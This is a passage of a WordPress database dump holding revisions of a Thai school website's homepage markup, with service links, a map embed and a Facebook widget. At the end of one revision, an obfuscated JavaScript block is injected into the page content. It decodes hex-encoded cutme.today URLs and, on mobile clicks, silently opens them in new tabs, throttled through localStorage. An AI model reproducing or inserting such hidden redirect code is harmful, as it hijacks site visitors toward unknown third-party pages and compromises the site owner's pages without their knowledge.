#ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1908,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การลา-1.png\" alt=\"\" class=\"wp-image-1908\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-24 10:43:36','2025-07-24 03:43:36','',14,'http://pakhaeng.ssk.in.th/?p=1909',0,'revision','',0),
(1910,1,'2025-07-29 12:36:41','2025-07-29 05:36:41','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[1904],\"type\":\"grid\",\"imageRatio\":\"land169\",\"linkTo\":\"custom\",\"captionStyles\":[{\"size\":[\"\",\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":6,\"textTransform\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"background\":\"#000000\",\"backgroundOpacity\":0.5}],\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":1904,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=1904\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr-1.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbyztUtl8EM-IiB9-zUQiX6uZlpuS1009A7GnLyQYTDE88aCpW5lZ-fTDR-YT54UB2_i/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr-1.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery 